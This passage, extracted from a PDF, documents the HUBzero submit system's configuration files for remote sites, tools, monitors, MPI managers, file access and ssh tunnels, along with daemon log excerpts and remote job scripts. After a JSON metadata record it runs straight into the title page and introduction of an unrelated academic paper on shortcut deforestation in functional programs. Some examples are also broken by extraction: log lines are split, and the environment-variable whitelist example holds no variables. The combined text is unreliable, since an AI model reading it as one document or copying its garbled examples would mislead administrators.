of configuration files. The configuration files contain descriptions of the various parameters required to connect to a remote domain, exchange files, and execute simulation codes. There are separate files for defining remote sites, staged tools, multiprocessor managers, file access controls, permissible environment variables, remote job monitors, and ssh tunneling. Most parameters have default values and it is not required that all parameters be explicitly defined in the configuration files. A simple example is given for each category of configuration file. Remote sites are defined in the file sites.dat. Each remote site is defined by a stanza indicating an access mechanism and other account and venue specific information. Defined keywords are: - **[name]** - site name. Used as command line argument (-v/--venue) and in tools.dat (destinations) - **venues** - comma separated list of hostnames. If multiple hostnames are listed one site will be chosen at random. - **tunnelDesignator** - name of tunnel defined in tunnels.dat. - **siteMonitorDesignator** - name of site monitor defined in monitors.dat. - **venueMechanism** - possible mechanisms are ssh and local. - **remoteUser** - login user at remote site. - **remoteBatchAccount** - some batch systems requirement that an account be provided in addition to user information. - **remoteBatchSystem** - the possible batch submission systems include CONDOR, PBS, SGE, and LSF. SCRIPT may also be specified to specify that a script will be executed directly on the remote host. - **remoteBatchQueue** - when remoteBatchSystem is PBS the queue name may be specified. - **remoteBatchPartition** - slurm parameter to define partition for remote job - **remoteBatchPartitionSize** - slurm parameter to define partition size, currently for BG machines. - **remoteBatchConstraints** - slurm parameter to define constraints for remote job - **parallelEnvironment** - sge parameter - **remoteBinDirectory** - define directory where shell scripts related to the site should be kept. - **remoteApplicationRootDirectory** - define directory where application executables are located. - **remoteScratchDirectory** - define the top level directory where jobs should be executed. Each job will create a subdirectory under remoteScratchDirectory to isolated jobs from each other. - **remotePpn** - set the number of processors (cores) per node. The PPN is applied to PBS and LSF job description files. The user may override the value defined here from the command line. - **remoteManager** - site specific multi-processor manager. Refers to definition in managers.dat. - `remoteHostAttribute` - define host attributes. Attributes are applied to PBS description files. - `stageFiles` - A True/False value indicating whether or not files should be staged to remote site. If the job submission host and remote host share a file system file staging may not be necessary. Default is True. - `passUseEnvironment` - A True/False value indicating whether or not the HUB 'use' environment should passed to the remote site. Default is False. True only makes sense if the remote site is within the HUB domain. - `arbitraryExecutableAllowed` - A True/False value indicating whether or not execution of arbitrary scripts or binaries are allowed on the remote site. Default is True. If set to False the executable must be staged or emanate from /apps. (deprecated) - `executableClassificationsAllowed` - classifications accepted by site. Classifications are set in appaccess.dat - `members` - a list of site names. Providing a member list gives a layer of abstraction between the user facing name and a remote destination. If multiple members are listed one will be randomly selected for each job. - `state` - possible values are enabled or disabled. If not explicitly set the default value is enabled. - `failoverSite` - specify a backup site if site is not available. Site availability is determined by site probes. - `checkProbeResult` - A True/False value indicating whether or not probe results should determine site availability. Default is True. - `restrictedToUsers` - comma separated list of user names. If the list is empty all users may garner site access. User restrictions are applied before group restrictions. - `restrictedToGroups` - comma separated list of group names. If the list is empty all groups may garner site access. - `logUserRemotely` - maintain log on remote site mapping HUB id, user to remote batch job id. If not explicitly set the default value is False. - `undeclaredSiteSelectionWeight` - used when no site is specified to choose between sites where selection weight > 0. - `minimumWallTime` - minimum walltime allowed for site or queue. Time should be expressed in minutes. - `maximumWallTime` - maximum walltime allowed for site or queue. Time should be expressed in minutes. - `minimumCores` - minimum number of cores allowed for site or queue. - `maximumCores` - maximum number of cores allowed for site or queue. - `pegasusTemplates` - pertinent pegasus templates for site, rc, and transaction files. An example stanza is presented for a site that is accessed through ssh. INSTALLATION ```bash $ hostname -f cluster.campus.edu $ whoami yourhub $ echo ${HOME} /home/yourhub $ printenv | grep SCRATCH CLUSTER_SCRATCH=/scratch/yourhub ``` ``` [cluster] venues = cluster.campus.edu remotePpn = 8 remoteBatchSystem = PBS remoteBatchQueue = standby remoteUser = yourhub remoteManager = mpich-intel64 venueMechanism = ssh remoteScratchDirectory = /scratch/yourhub siteMonitorDesignator = clusterPBS ``` Tools Staged tools are defined in the file `tools.dat`. Each staged tool is defined by a stanza indicating an where a tool is staged and any access restrictions. The existence of a staged tool at multiple sites can be expressed with multiple stanzas or multiple destinations within a single stanza. If the tool requires multiprocessors a manager can also be indicated. Defined keywords are - **[name]** - tool name. Used as command line argument to execute staged tools. Repeats are permitted to indicate staging at multiple sites. - **destinations** - comma separated list of destinations. Destination may exist in `sites.dat` or be a grid site defined by a ClassAd file. - **executablePath** - path to executable at remote site. The path may be given as an absolute path on the remote site or a path relative to `remoteApplicationRootDirectory` defined in `sites.dat`. - **restrictedToUsers** - comma separated list of user names. If the list is empty all users may garner tool access. User restrictions are applied before group restrictions. - **restrictedToGroups** - comma separated list of group names. If the list is empty all groups may garner tool access. - **environment** - comma separated list of environment variables in the form `e=v`. - **remoteManager** - tool specific multi-processor manager. Refers to definition in `managers.dat`. Overrides value set by site definition. - **state** - possible values are enabled or disabled. If not explicitly set the default value is An example stanza is presented for a staged tool maintained in the yourhub account on a remote site. ``` [earth] destinations = cluster executablePath = ${HOME}/apps/planets/bin/earth.x remoteManager = mpich-intel [sun] destinations = cluster executablePath = ${HOME}/apps/stars/bin/sun.x remoteManager = mpich-intel ``` **Monitors** Remote job monitors are defined in the file monitors.dat. Each remote monitor is defined by a stanza indicating where the monitor is located and to be executed. Defined keywords are - [name] - monitor name. Used in sites.dat (siteMonitorDesignator) - venue - hostname upon which to launch monitor daemon. Typically this is a cluster headnode. - venueMechanism - monitoring job launch process. The default is ssh. - tunnelDesignator - name of tunnel defined in tunnels.dat. INSTALLATION - remoteUser - login user at remote site. - remoteBinDirectory - define directory where shell scripts related to the site should be kept. - remoteMonitorCommand - command to launch monitor daemon process. - state - possible values are enabled or disabled. If not explicitly set the default value is enabled. An example stanza is presented for a remote monitor tool used to report status of PBS jobs. ``` [clusterPBS] venue = cluster.campus.edu remoteUser = yourhub remoteMonitorCommand = ${HOME}/SubmitMonitor/monitorPBS.py ``` Multi-processor managers Multiprocessor managers are defined in the file managers.dat. Each manager is defined by a stanza indicating the set of commands used to execute a multiprocessor simulation run. Defined keywords are - [name] - manager name. Used in sites.dat and tools.dat. - computationMode - indicate how to use multiple processors for a single job. Recognized values are mpi, parallel, and matlabmpi. Parallel application request multiprocess have there own mechanism for inter process communication. Matlabmpi is used to enable the an Matlab implementation of MPI. - preManagerCommands - comma separated list of commands to be executed before the manager command. Typical use of pre manager commands would be to define the environment to include a particular version of MPI amd/or compiler, or setup MPD. - managerCommand - manager command commonly mpirun. It is possible to include strings that will be sustituted with values defined from the command line. - postManagerCommands - comma separated list of commands to be executed when the manager command completes. A typical use would be to terminate an MPD setup. - mpiRankVariable - define environment variable set by manager command to define process rank. Recognized values are: MPIRUN_RANK, GMPI_ID, RMS_RANK, MXMPI_ID, MSTI_RANK, PMI_RANK, and OMPI_MCA_ns_nds_vpid. If no variable is given an attempt is made to determine process rank from command line arguments. - environment - comma separated list of environment variables in the form e=v. - moduleInitialize - initialize module script for sh - modulesUnload - modules to be unloaded clearing way for replacement modules - modulesLoad - modules to load to define mpi and other libraries - state - possible values are enabled or disabled. If not explicitly set the default value is enabled. An example stanza is presented for a typical MPI instance. The given command should be suitable for /bin/sh execution. ``` [mpich-intel] preManagerCommands = . $(MODULESHOME)/init/sh, module load mpich-intel/11.1.038 managerCommand = mpirun -machinefile ${PBS_NODEFILE} -np NPROCESSORS ``` The token NPROCESSORS is replaced by an actual value at runtime. **File access controls** Application or file level access control is described by entries listed in the file appaccess.dat. The ability to transfer files from the HUB to remote sites is granted on a group basis as defined by white and black lists. Each list is given a designated priority and classification. In cases where a file appears on multiple lists, the highest priority takes precedence. Simple wildcard operators are allowed the in the filename declaration allowing for easy listing of entire directories. Each site lists acceptable classification(s) in sites.dat. Defined keywords are - [group] - group name. - whitelist - comma separated list of paths. Wildcards allowed. • blacklist - comma separated list of paths. Wildcards allowed. • priority - higher priority wins • classification - apps or user. user class are treated are arbitrary executables. • state - possible values are enabled or disabled. If not explicitly set the default value is enabled. An example file giving permissions reminiscent of those defined in earlier submit releases is presented here ``` [public] whitelist = /apps/.* priority = 0 classification = apps [submit] whitelist = ${HOME}/.* priority = 0 classification = home ``` The group public is intended to include all users. Your system may use a different group such as users for this purpose. The definitions shown here allow all users access to files in /apps where applications are published. Additionally members of the submit group are allowed to send files from their $HOME directory. Environment variables Legal environment variables are listed in the file environmentwhitelist.dat. The objective is to prevent end users from setting security sensitive environment variables while allowing application specific variables to be passed to the remote site. Environment variables required to define multiprocessor execution should also be included. The permissible environment variables should be entered as a simple list - one entry per line. An example file allowing use of a variables used by openmp and mpich is presenter here. ``` # environment variables listed here can be specified from the command line with -e/--env option. Attempts to specify other environment variables will be ignored and the values will not be passed to the remote site. ``` Tunnels In some circumstances, access to clusters is restricted such that only a select list of machines is allowed to communicate with the cluster job submission node. The machines that are granted such access are sometimes referred to as gateways. In such circumstances, ssh tunneling or port forwarding can be used to submit HUB jobs through the gateway machine. Tunnel definition is specified in the file tunnels.dat. Each tunnel is defined by a stanza indicating gateway host and port information. Defined keywords are - [name] - tunnel name. - venue - tunnel target host. - venuePort - tunnel target port. - gatewayHost - name of the intermediate host. - gatewayUser - login user on gatewayHost. - localPortOffset - local port offset used for forwarding. Actual port is localPortMinimum + localPortOffset An example stanza is presented for a tunnel between the HUB and a remote venue by way of an accepted gateway host. [cluster] venue = cluster.campus.edu venuePort = 22 gatewayHost = gateway.campus.edu gatewayUser = yourhub localPortOffset = 1 Initialization Scripts and Log Files The submit server and job monitoring server must be started as daemon processes running on the submit host. If ssh tunneling is going to be used an addition server must be started as a daemon process. Each daemon process writes to a centralized log file facilitating error recording and debugging. Initialize daemon scripts Scripts for starting the server daemons are provided and installed in /etc/init.d. The default settings for when to start and terminate the scripts are adequate. Log files Submit processes log information to files located in the /var/log/submit directory tree. The exact location varies depending on the vintage of the installation. Each process has its own log file. The three most important log files are submit-server.log, distributor.log, and monitorJob.log. submit.log The submit-server.log file tracks when the submit server is started and stopped. Each connection from the submit client is logged with the command line and client ip address reported. All log entries are timestamped and reported by submit-server process ID (PID) or submit ID (ID:) once one has been assigned. Entries from all jobs are simultaneously reported and intermingled. The submit ID serves as a good search key when tracing problems. Examples of startup, job execution, and termination are given here. The job exit status and time metrics are also recorded in the MyQSL database JobLog table. [Sun Aug 26 17:28:24 2012] 0: ######################################## [Sun Aug 26 17:28:24 2012] 0: Listening: protocol='tcp', host='', port =830 [Sun Sep 23 12:33:28 2012] (1154) =============== The distributor.log file tracks each job as it progresses from start to finish. Details of remote site assignment, queue status, exit status, and command execution are all reported. All entries are timestamped and reported by submit ID. The submit ID serves as the key to join data reported in submit-server.log. An example for submit ID 1659 is listed here. Again the data for all jobs are intermingled. ``` [Sun Sep 23 00:04:21 2012] 0: quotaCommand = quota -w | tail -n 1 [Sun Sep 23 00:04:21 2012] 1659: command = tar vchf 00001659_01_input. tar --exclude='*.svn*' -C /home/hubzero/user/data/sessions/3984L/./local_jobid.00001659_01 sayhiinquire.dax [Sun Sep 23 00:04:21 2012] 1659: remoteCommand pegasus- plan --dax ./sayhiinquire.dax [Sun Sep 23 00:04:21 2012] 1659: workingDirectory /home/hubzero/user/d data/sessions/3984L [Sun Sep 23 00:04:21 2012] 1659: command = tar vrhf 00001659_01_input. tar --exclude='*.svn*' -C /home/hubzero/user/data/sessions/3984L/0001 659/01 00001659_01.sh [Sun Sep 23 00:04:21 2012] 1659: command = nice -n 19 gzip 00001659_01 _input.tar [Sun Sep 23 00:04:21 2012] 1659: command = /opt/submit/bin/receiveinpu t.sh /home/hubzero/user/data/sessions/3984L/00001659/01 /home/hubzero/ user/data/sessions/3984L/00001659/01/.__timestamp_transferred.00001659 _01 [Sun Sep 23 00:04:21 2012] 1659: command = /opt/submit/bin/submitbatch job.sh /home/hubzero/user/data/sessions/3984L/00001659/01 ./00001659_0 1.pegasus [Sun Sep 23 00:04:23 2012] 1659: remoteJobId = 2012.09.23 00:04:22.996 EDT: Submitting job(s). 2012.09.23 00:04:23.002 EDT: 1 job(s) submitted to cluster 946. 2012.09.23 00:04:23.007 EDT: 2012.09.23 00:04:23.012 EDT: --------------------------------------- -------------------------------- 2012.09.23 00:04:23.017 EDT: File for submitting this DAG to Condor : sayhi_inquire-0.dag.condor.sub 2012.09.23 00:04:23.023 EDT: Log of DAGMan debugging messages : sayhi_inquire-0.dag.dagman.out 2012.09.23 00:04:23.028 EDT: Log of Condor library output : sayhi_inquire-0.dag.lib.out 2012.09.23 00:04:23.033 EDT: Log of Condor library error messages : sayhi_inquire-0.dag.lib.err 2012.09.23 00:04:23.038 EDT: Log of the life of condor_dagman itself : sayhi_inquire-0.dag.dagman.log 2012.09.23 00:04:23.044 EDT: 2012.09.23 00:04:23.049 EDT: --------------------------------------- 2012.09.23 00:04:23.054 EDT: 2012.09.23 00:04:23.059 EDT: Your Workflow has been started and runs in base directory given below 2012.09.23 00:04:23.064 EDT: 2012.09.23 00:04:23.070 EDT: cd /home/hubzero/user/data/sessions/3984L/00001659/01/work/pegasus 2012.09.23 00:04:23.075 EDT: 2012.09.23 00:04:23.080 EDT: *** To monitor the workflow you can run *** 2012.09.23 00:04:23.085 EDT: 2012.09.23 00:04:23.090 EDT: pegasus-status -l /home/hubzero/user/data/sessions/3984L/00001659/01/work/pegasus 2012.09.23 00:04:23.096 EDT: 2012.09.23 00:04:23.101 EDT: *** To remove your workflow run *** 2012.09.23 00:04:23.106 EDT: pegasus-remove /home/hubzero/user/data/sessions/3984L/00001659/01/work/pegasus 2012.09.23 00:04:23.111 EDT: 2012.09.23 00:04:23.117 EDT: Time taken to execute is 0.993 seconds [Sun Sep 23 00:04:23 2012] 1659: status:Job N WF-DiaGrid [Sun Sep 23 00:04:38 2012] 1659: status:DAG R WF-DiaGrid [Sun Sep 23 00:10:42 2012] 0: quotaCommand = quota -w | tail -n 1 [Sun Sep 23 00:10:42 2012] 1660: command = tar vchf 00001660_01_input.tar --exclude='*.svn*' -C /home/hubzero/clarksm .__local_jobid.00001660_01 noerror.sh [Sun Sep 23 00:10:42 2012] 1660: remoteCommand ./noerror.sh [Sun Sep 23 00:10:42 2012] 1660: workingDirectory /home/hubzero/clarksm [Sun Sep 23 00:10:42 2012] 1660: command = tar vrhf 00001660_01_input.tar --exclude='*.svn*' -C /home/hubzero/clarksm/00001660/01 00001660_01.sh [Sun Sep 23 00:10:42 2012] 1660: command = nice -n 19 gzip 00001660_01_input.tar [Sun Sep 23 00:10:42 2012] 1660: command = /opt/submit/bin/receiveinput.sh /home/hubzero/clarksm/00001660/01 /home/hubzero/clarksm/00001660/01/.__timestamp_transferred.00001660_01 [Sun Sep 23 00:10:42 2012] 1660: command = /opt/submit/bin/submitbatchjob.sh /home/hubzero/clarksm/00001660/01 ./00001660_01.condor [Sun Sep 23 00:10:42 2012] 1660: remoteJobId = Submitting job(s). 1 job(s) submitted to cluster 953. [Sun Sep 23 00:10:42 2012] 1660: status:Job N DiaGrid [Sun Sep 23 00:11:47 2012] 1660: status:Simulation I DiaGrid [Sun Sep 23 00:12:07 2012] 1660: Received SIGINT! [Sun Sep 23 00:12:07 2012] 1660: waitForBatchJobs: nCompleteRemoteJobIndexes = 0, nIncompleteJobs = 1, abortGlobal = True [Sun Sep 23 00:12:07 2012] 1660: command = /opt/submit/bin/killbatchjob.sh 953.0 CONDOR monitorJob.log The monitorJob.log file tracks the invocation and termination of each remotely executed job monitor. The remote job monitors are started on demand when job are submitted to remote sites. The remote job monitors terminate when all jobs complete at a remote site and no new activity has been initiated for a specified amount of time - typically thirty minutes. A typical report should look like: [Sun Aug 26 17:29:16 2012] (1485) **************************** [Sun Aug 26 17:29:16 2012] (1485) * distributor job monitor started * [Sun Aug 26 17:29:16 2012] (1485) **************************** [Sun Aug 26 17:29:16 2012] (1485) loading active jobs [Sun Aug 26 17:29:16 2012] (1485) 15 jobs loaded from DB file It is imperative that the job monitor be running in order for notification of job progress to occur. If users report that their job appears to hang check to make sure the job monitor is running. If necessary take corrective action and restart the daemon. monitorTunnel.log The monitorTunnel.log file tracks invocation and termination of each ssh tunnel connection. If users report problems with job submission to sites accessed via an ssh tunnel this log file should be checked for indication of any possible problems. Remote Domain Configuration For job submission to remote sites via ssh it is necessary to configure a remote job monitor and a set of scripts to perform file transfer and batch job related functions. A set of scripts can be used for each different batch submission system or in some cases they may be combined with appropriate switching based on command line arguments. A separate job monitor is need for each batch submission system. Communication between the HUB and remote resource via ssh requires inclusion of a public key in the authorized_keys file. **Job monitor daemon** A remote job monitor runs a daemon process and reports batch job status to a central job monitor located on the HUB. The daemon process is started by the central job monitor on demand. The daemon terminates after a configurable amount of inactivity time. The daemon code needs to be installed in the location declared in the monitors.dat file. The daemon requires some initial configuration to declare where it will store log and history files. The daemon does not require any special privileges any runs as a standard user. Typical configuration for the daemon looks like this: ``` $ cat monitors.dat [cluster=PBS] venue = cluster.campus.edu remoteUser = yourhub remoteMonitorCommand = $HOME/Submit/monitorPBS.py ``` The directory defined by MONITORLOGLOCATION needs to be created before the daemon is started. Sample daemon scripts used for PBS, LSF, SGE, Condor, Load Leveler, and Slurm batch systems are included in directory BatchMonitors. **File transfer and batch job scripts** The simple scripts are used to manage file transfer and batch job launching and termination. The location of the scripts is entered in sites.dat. ``` $ cat sites.dat [clusterPBS] venue = cluster.campus.edu remoteUser = yourhub remoteBinDirectory = ${HOME}/bin ``` Examples scripts suitable for use with PBS, LSF, Condor, Load Leveler, and Slurm are included in directory Scripts. After modifications are made to monitors.dat the central job monitor must be notified. This can be accomplished by stopping and starting the submon daemon or a HUP signal can be sent to the monitorJob.py process. ### File transfer - input files Receive compressed tar file containing input files required for the job on stdin. The file transferredTimestampFile is used to determine what newly created or modified files should be returned to the HUB. ``` receiveinput.sh jobWorkingDirectory jobScratchDirectory transferredTimestampFile ``` ### Batch job script - submission Submit batch job using supplied description file. If arguments beyond job working directory and batch description file are supplied an entry is added to the remote site log file. The log file provides a record relating the HUB end user to the remote batch job identifier. The log file should be placed at a location agreed upon by the remote site and HUB. ``` submitbatchjob.sh jobWorkingDirectory jobScratchDirectory jobDescriptionFile ``` The jobId is returned on stdout if job submission is successful. For an unsuccessful job submission the returned jobId should be -1. **File transfer - output files** Return compressed tar file containing job output files on stdout. ``` transmitresults.sh jobWorkingDirectory ``` **File transfer - cleanup** Remove job specific directory and any other dangling files ``` cleanupjob.sh jobWorkingDirectory jobScratchDirectory jobClass ``` **Batch job script - termination** Terminate given remote batch job. Command line arguments specify job identifier and batch system type. ``` killbatchjob.sh jobId jobClass ``` **Batch job script - post process** For some jobClassses it is appropriate to preform standard post processing actions. An example of such a jobClass is Pegasus. ``` postprocessjob.sh jobWorkingDirectory jobScratchDirectory jobClass ``` **Access Control Mechanisms** By default tools and sites are configured so that access is granted to all HUB members. In some cases it is desired to restrict access to either a tool or site to a subset of the HUB membership. The keywords restrictedToUsers and restrictedToGroups provide a mechanism to apply restrictions accordingly. Each keyword should be followed by a list of comma separated values of userids (logins) or groupids (as declared when creating a new HUB group). If user or group restrictions have been declared upon invocation of submit a comparison is made between the restrictions and userid and group memberships. If both user and group restrictions are declared the user restriction will be applied first, followed by the group restriction. In addition to applying user and group restrictions another mechanism is provided by the executableClassificationsAllowed keyword in the sites configuration file. In cases where the executable program is not pre-staged at the remote sites the executable needs to be transferred along with the user supplied inputs to the remote site. Published tools will have their executable program located in the /apps/tools/revision/bin directory. For this reason submitted programs that reside in /apps are assumed to be validated and approved for execution. The same cannot be said for programs in other directories. The common case where such a situation arises is when a tool developer is building and testing within the HUB workspace environment. To grant a tool developer the permission to submit such arbitrary applications the site configuration must allow arbitrary executables and the tool developer must be granted permission to send files from their $HOME directory. Discrete permission can be granted on a file by file basis in appaccess.dat.
{"Source-Url": "https://help.hubzero.org/documentation/22/installation/centos7/install?action=pdf&children=1", "len_cl100k_base": 10088, "olmocr-version": "0.1.53", "pdf-total-pages": 34, "total-fallback-pages": 0, "total-input-tokens": 56687, "total-output-tokens": 12400, "length": "2e13", "weborganizer": {"__label__adult": 0.00031566619873046875, "__label__art_design": 0.0004682540893554687, "__label__crime_law": 0.0003490447998046875, "__label__education_jobs": 0.004039764404296875, "__label__entertainment": 0.00016689300537109375, "__label__fashion_beauty": 0.00014078617095947266, "__label__finance_business": 0.0012521743774414062, "__label__food_dining": 0.0002191066741943359, "__label__games": 0.0011301040649414062, "__label__hardware": 0.006000518798828125, "__label__health": 0.00023353099822998047, "__label__history": 0.0002963542938232422, "__label__home_hobbies": 0.00028967857360839844, "__label__industrial": 0.0007991790771484375, "__label__literature": 0.0002067089080810547, "__label__politics": 0.0002467632293701172, "__label__religion": 0.0003635883331298828, "__label__science_tech": 0.058319091796875, "__label__social_life": 0.00016641616821289062, "__label__software": 0.2998046875, "__label__software_dev": 0.62451171875, "__label__sports_fitness": 0.00014388561248779297, "__label__transportation": 0.0003147125244140625, "__label__travel": 0.0002294778823852539}, "weborganizer_max": "__label__software_dev", "avg_fraction_numbers_in_line_v1__avg_fraction_numbers_in_line_v1__avg_fraction_numbers_in_line_ratio": [[0, 42543, 0.04574]], "fineweb_edu_fasttext_gt2__fineweb_edu_fasttext_gt2__score": [[0, 42543, 0.28319]], "ft_lang_id_en_doc_v2__ft_lang_id_en_doc_v2__en": [[0, 42543, 0.7988]], "google_gemma-3-12b-it_contains_pii": [[0, 1588, false], [1588, 3873, null], [3873, 5003, null], [5003, 5854, null], [5854, 6602, null], [6602, 6745, null], [6745, 7484, null], [7484, 8718, null], [8718, 8922, null], [8922, 9806, null], [9806, 11197, null], [11197, 12632, null], [12632, 12695, null], [12695, 12883, null], [12883, 14461, null], [14461, 15832, null], [15832, 17871, null], [17871, 20434, null], [20434, 22351, null], [22351, 23163, null], [23163, 24838, null], [24838, 26567, null], [26567, 28193, null], [28193, 29250, null], [29250, 30946, null], [30946, 31049, null], [31049, 33360, null], [33360, 35654, null], [35654, 36377, null], [36377, 37457, null], [37457, 38563, null], [38563, 39872, null], [39872, 41139, null], [41139, 42543, null]], "google_gemma-3-12b-it_is_public_document": [[0, 1588, true], [1588, 3873, null], [3873, 5003, null], [5003, 5854, null], [5854, 6602, null], [6602, 6745, null], [6745, 7484, null], [7484, 8718, null], [8718, 8922, null], [8922, 9806, null], [9806, 11197, null], [11197, 12632, null], [12632, 12695, null], [12695, 12883, null], [12883, 14461, null], [14461, 15832, null], [15832, 17871, null], [17871, 20434, null], [20434, 22351, null], [22351, 23163, null], [23163, 24838, null], [24838, 26567, null], [26567, 28193, null], [28193, 29250, null], [29250, 30946, null], [30946, 31049, null], [31049, 33360, null], [33360, 35654, null], [35654, 36377, null], [36377, 37457, null], [37457, 38563, null], [38563, 39872, null], [39872, 41139, null], [41139, 42543, null]], "google_gemma-3-4b-it_v2tag__is_academic_paper": [[0, 5000, false], [5000, 42543, null]], "google_gemma-3-4b-it_v2tag__is_class_syllabus": [[0, 5000, false], [5000, 42543, null]], "google_gemma-3-4b-it_v2tag__is_completion_certificate": [[0, 5000, false], [5000, 42543, null]], "google_gemma-3-4b-it_v2tag__is_court_notice": [[0, 5000, false], [5000, 42543, null]], "google_gemma-3-4b-it_v2tag__is_homework_assignment": [[0, 5000, false], [5000, 42543, null]], "google_gemma-3-4b-it_v2tag__is_news_article": [[0, 5000, false], [5000, 42543, null]], "google_gemma-3-4b-it_v2tag__is_public_order": [[0, 5000, false], [5000, 42543, null]], "google_gemma-3-4b-it_v2tag__is_resume_cv": [[0, 5000, false], [5000, 42543, null]], "google_gemma-3-4b-it_v2tag__is_test_or_quiz": [[0, 5000, false], [5000, 42543, null]], "google_gemma-3-4b-it_v2tag__is_textbook": [[0, 5000, false], [5000, 42543, null]], "pdf_page_numbers": [[0, 1588, 1], [1588, 3873, 2], [3873, 5003, 3], [5003, 5854, 4], [5854, 6602, 5], [6602, 6745, 6], [6745, 7484, 7], [7484, 8718, 8], [8718, 8922, 9], [8922, 9806, 10], [9806, 11197, 11], [11197, 12632, 12], [12632, 12695, 13], [12695, 12883, 14], [12883, 14461, 15], [14461, 15832, 16], [15832, 17871, 17], [17871, 20434, 18], [20434, 22351, 19], [22351, 23163, 20], [23163, 24838, 21], [24838, 26567, 22], [26567, 28193, 23], [28193, 29250, 24], [29250, 30946, 25], [30946, 31049, 26], [31049, 33360, 27], [33360, 35654, 28], [35654, 36377, 29], [36377, 37457, 30], [37457, 38563, 31], [38563, 39872, 32], [39872, 41139, 33], [41139, 42543, 34]], "pipe_delimited_lines_v1__pipe_delimited_lines_v1__pipe_delimited_lines_ratio": [[0, 42543, 0.0]]}
olmocr_science_pdfs
2024-12-10
2024-12-10
bc912ed6a3e3a164cc36f40bcc7988c0db592ec6
<table> <thead> <tr> <th><strong>Title</strong></th> <th>Shortcut Deforestation in Calculational Form (Theory of Rewriting Systems and Its Applications)</th> </tr> </thead> <tbody> <tr> <td><strong>Author(s)</strong></td> <td>Takano, Akihiko; Meijer, Erik</td> </tr> <tr> <td><strong>Citation</strong></td> <td>数理解析研究所講究録 (1995), 918: 253-267</td> </tr> <tr> <td><strong>Issue Date</strong></td> <td>1995-08</td> </tr> <tr> <td><strong>URL</strong></td> <td><a href="http://hdl.handle.net/2433/59662">http://hdl.handle.net/2433/59662</a></td> </tr> <tr> <td><strong>Type</strong></td> <td>Departmental Bulletin Paper</td> </tr> <tr> <td><strong>Textversion</strong></td> <td>publisher</td> </tr> </tbody> </table> Kyoto University Shortcut Deforestation in Calculational Form * Akihiko Takano Hitachi Advanced Research Lab Hatoyama, Saitama 350-03 Japan takano@harl.hitachi.co.jp Erik Meijer Utrecht University 3508 TB Utrecht The Netherlands erik@cs.ruu.nl Abstract In functional programming, intermediate data structures are often used to "glue" together small programs. Deforestation is a program transformation to remove these intermediate data structures automatically. We present a simple algorithm for deforestation based on two fusion rules for hylomorphism, an expressive recursion pattern. A generic notation for hylomorphisms is introduced, where natural transformations are explicitly factored out, and it is used to represent programs. Our method successfully eliminates intermediate data structures of any algebraic type from a much larger class of compositional functional programs than previous techniques. 1 Introduction In functional programming, programs are often constructed by "gluing" together small components, using intermediate data structures to convey information between them. Such data are constructed in one component and later consumed in another component, but never appear in the result of the whole program. The compositional style of programming has many advantages of clarity and higher level of modularity, but these intermediate data structures give rise to an efficiency problem. Inspired by Turchin's early work on the supercompiler [TNT82, Tur86], Wadler [Wad88] introduced the idea of deforestation to tackle this problem. His algorithm for deforestation eliminates arbitrary tree-like intermediate data structures (including lists) when applied to treeless programs. There have been various attempts to extend his method ([Chi92, Ssr94]), but still major drawbacks remain. All these algorithms basically have to keep track of all function calls occurred previously, and suitably introduce a definition of recursive function on detecting a repetition. This corresponds to the fold step of Burstall and Darlington ([BD77]). The process of keeping track of function calls and the clever control to avoid infinite unfolding introduces substantial cost and complexity in algorithms, which prevent deforestation to be adopted as part of the regular optimizations in any serious compilers of functional languages. Recently two new approaches to deforestation have been proposed [GLPJ93, SF93]. Both of them pick up the function fold as a useful template to capture the structure of programs, and apply transformations only to programs written in terms of the fold function. Both techniques do not require any global analysis to guarantee termination and the applicability of their rules of transformation can be checked locally. Because their theoretical basis can be found in the study *Earlier version of this paper was presented at FPCA'95. on *Constructive Algorithms* [Mee86, MFP91, Mei92, Fok92, Jeu93], we baptise them as *deforestation in calculational form*. Although the method in [GLPJ93] is limited to the specific data structure of lists, it was shown clearly that this calculation-based deforestation is more practical than the original style deforestation and its extensions. By using the foldr/build as the basis to standardize the structure of consuming/producing functions of lists, their transformation is the repetitive applications of the single rule of cancellation for a pair of foldr and build. Each application of the rule can be seen as a canned application of unfold/simplify/fold in the traditional deforestation. In [GLPJ93] the rule and its correctness proof are given only in the specific context of lists, and the extension to the other data structures is simply suggested. Once embedded in the proper theoretical framework it becomes clear how to generalize their method to other data structures. Sheard and Pegaras [SF93] demonstrated that folding can be defined for many algebraic types definable in languages like ML (i.e. mutually recursive sum-of-product types). Their *normalization algorithm* automatically calculates a potentially normalizable fold program (analogous to a treeless program) into its canonical form. The algorithm is essentially based on the so-called fusion theorem, and repetitively replaces the nested application of two fold functions with one fold. They also gave definitions of other recursive forms such as generalized unfolds (derive function) and primitive recursion together with their corresponding fusion theorems. The normalization algorithms for these recursive patterns were not given. In this paper we show that a single transformation rule (and its dual), the *Acid Rain Theorem* [Mei94], elegantly generalizes the foldr/build to *any* algebraic data types. We introduce a generic notation for *hylomorphisms*, which generalizes both folds and unfolds and use it to represent the structure of programs. We show the acid rain theorem can be stated as the fusion rules for hylomorphisms with no side condition. Based on these rules, we introduce a new deforestation algorithm to eliminate intermediate data structures of any algebraic type from much larger class of compositional functional programs than the deforestation algorithms above. The contribution of this paper is as follows: - Our technique is applicable to any functional program in compositional style, and removes intermediate data of any algebraic type. We propose a generic notation for *hylomorphisms* to explicitly factor out the natural transformation, and the structure of the program is represented using this notation. Our new representation facilitates us to state the acid rain theorem and the rules of transformation in uniform way. - Our technique is a direct generalization of [GLPJ93]. Thanks to the categorical characterization of data types, the theorem naturally covers the dual of the foldr/build theorem. Our optimization is based on two simple local transformations: the generalization of fold/build cancellation rule and the dual of it. The technique is also cheap and practical to implement in real compilers. - Our method is more powerful than the method in [GLPJ93] even when restricted to the list data structure. Typically, the function zip, which could not be deforested in both parameters by their method, is not an exception any more. Our method successfully deforests zip in both of its parameters (Section 4.5). - Our method also generalizes the result of [SF93] by adopting hylomorphism as the basic form to represent programs. Because fold (catamorphism) and unfold (dual of catamorphism) are instances of hylomorphism, our method does not only work on fold programs \[\text{For more info check out the WWW page http://www.cs.utwente.nl/~fokkinga/algorithmics.html}\] but also on the programs built up from fold and its dual. Our technique can also be extended to work on primitive recursion. This paper is organized as follows. In section 2 we review the previous work in program calculation which is the theoretical base of our method. In section 3 we introduce a triplet notation for hylomorphisms and the fusion rules for them, which are the key rules of our method. In section 4 our transformation algorithm is defined and applied to some examples. In section 5 we discuss related work. 2 Program Calculation In this section we briefly review the previous work on constructive algorithmics ([MFP91, Mei92, Fok92, Mei94]) and explain some basic facts which provides the theoretical basis of our deforestation algorithm. In this paper our default category C for types is CPO, the category of complete partial 